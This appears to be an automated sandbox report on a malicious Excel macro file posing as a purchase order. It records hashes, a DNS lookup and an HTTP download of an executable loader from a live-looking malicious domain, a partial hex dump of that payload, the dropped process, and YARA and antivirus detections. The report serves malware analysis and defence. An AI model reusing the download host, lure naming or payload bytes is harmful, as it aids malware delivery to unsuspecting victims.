Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.772704052855693
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:PURCHASE ORDER No-17-11-98543.xlsm
File size:401046
MD5:921ac551fe8d88c2185f39f0e777eabd
SHA1:40702dc4f773cfa3fcf03c62ec810ba3f5e6b72d
SHA256:b1660b65514182bf97a767caa264b0500ef14692e69dae6ddca344591e7e016d
SHA512:41ca8f90604f42fc4a6685293d349e11e4267a2bbb09986a9ba4e5aaccf6424386cf877ddf7dfb5898314a388bce02390537ea7cbe37255f8d3730d050c057aa
SSDEEP:6144:AESKAVwFGxh1huWtcGWSoyGEAfFgCOExMR:tSKAVwFMtuEcd6GEAfF9x4
File Content Preview:PK..........!.v.Fa............docProps/app.xml ...(............................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "PURCHASE ORDER No-17-11-98543.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 18, 2020 07:57:22.702124119 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.760700941 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.760807991 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.761539936 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.819969893 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.830245018 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.830284119 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.830322981 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.830338001 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.830382109 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.830415964 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834037066 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834095001 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834167004 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834170103 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834219933 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834230900 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834289074 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834362984 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834403992 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834440947 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.834477901 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.834654093 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.835695982 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889010906 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889027119 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889090061 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889094114 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889122963 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889137030 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889257908 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889316082 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889333963 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889379025 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889451027 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889496088 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889579058 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889630079 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.889655113 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.889700890 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.891089916 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.892719030 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.892774105 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.892829895 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.892855883 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.892894030 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.892968893 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.892992973 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893013000 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893090010 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893150091 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893174887 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893232107 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893290043 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893347979 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893373013 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893455029 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893526077 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893585920 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893651009 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893654108 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893717051 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893781900 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893857956 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.893861055 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.893913984 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.896778107 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.947757959 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.947827101 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.947845936 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.947926998 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.947952032 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.947954893 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.947993994 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948029041 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948065996 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948134899 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948178053 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948230028 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948272943 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948359013 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948404074 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948508978 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948559046 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948582888 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948622942 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948703051 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948745012 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948831081 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948873997 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.948945999 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.948988914 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.949076891 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.949155092 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.949194908 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.949265003 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.949304104 CET8049167193.106.175.25192.168.2.22
Nov 18, 2020 07:57:22.949351072 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.949570894 CET4916780192.168.2.22193.106.175.25
Nov 18, 2020 07:57:22.951247931 CET8049167193.106.175.25192.168.2.22

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 18, 2020 07:57:22.464179039 CET5219753192.168.2.228.8.8.8
Nov 18, 2020 07:57:22.688311100 CET53521978.8.8.8192.168.2.22

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Nov 18, 2020 07:57:22.464179039 CET192.168.2.228.8.8.80xfda2Standard query (0)gvbmkhvnyib.topA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Nov 18, 2020 07:57:22.688311100 CET8.8.8.8192.168.2.220xfda2No error (0)gvbmkhvnyib.top193.106.175.25A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • gvbmkhvnyib.top

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.2249167193.106.175.2580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
Nov 18, 2020 07:57:22.761539936 CET0OUTGET /QtuFGobZaW/conhost.triumphloader HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: gvbmkhvnyib.top
Connection: Keep-Alive
Nov 18, 2020 07:57:22.830245018 CET2INHTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Nov 2020 06:57:22 GMT
Content-Length: 297472
Connection: keep-alive
Last-Modified: Wed, 18 Nov 2020 00:57:27 GMT
ETag: "48a00-5b457185761f5"
Accept-Ranges: bytes
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 0c 68 70 55 44 00 e8 2c 12 00 00 83 65 e4 00 8b 75 08 3b 35 44 ba 49 00 77 22 6a 04 e8 1d 07 00 00 59 83 65 fc 00 56 e8 24 0f 00 00 59 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 38 12 00 00 c3 6a 04 e8 18 06 00 00 59 c3 8b ff 55 8b ec 56 8b 75 08 83 fe e0 0f 87 a1 00 00 00 53
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$rhrhrh rh rh rhrhrirh rh rh rhRichrhPELP^$@@,Y<&0UT@@.textU#$ `.rdata0"@$(@@.dataXJpL@.tls`@.rsrc&(b@@jhpUD,eu;5DIw"jYeV$YEEE8jYUVuS


Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

General

Start time:07:56:46
Start date:18/11/2020
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f470000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:07:56:50
Start date:18/11/2020
Path:C:\ETTER\dAneDFma\conhost.exe
Wow64 process (32bit):true
Commandline:'C:\ETTER\dAneDFma\conhost.exe'
Imagebase:0x400000
File size:297472 bytes
MD5 hash:F5ECCDDC7EE3DF74B79DF21D04DD56A1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, Author: Florian Roth
  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, Author: Florian Roth
  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, Author: Florian Roth
  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, Author: Florian Roth
  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
Antivirus matches:
  • Detection: 100%, Joe Sandbox ML
  • Detection: 29%, Virustotal, Browse
  • Detection: 23%, ReversingLabs
Reputation:low

Disassembly

Code Analysis

Reset < >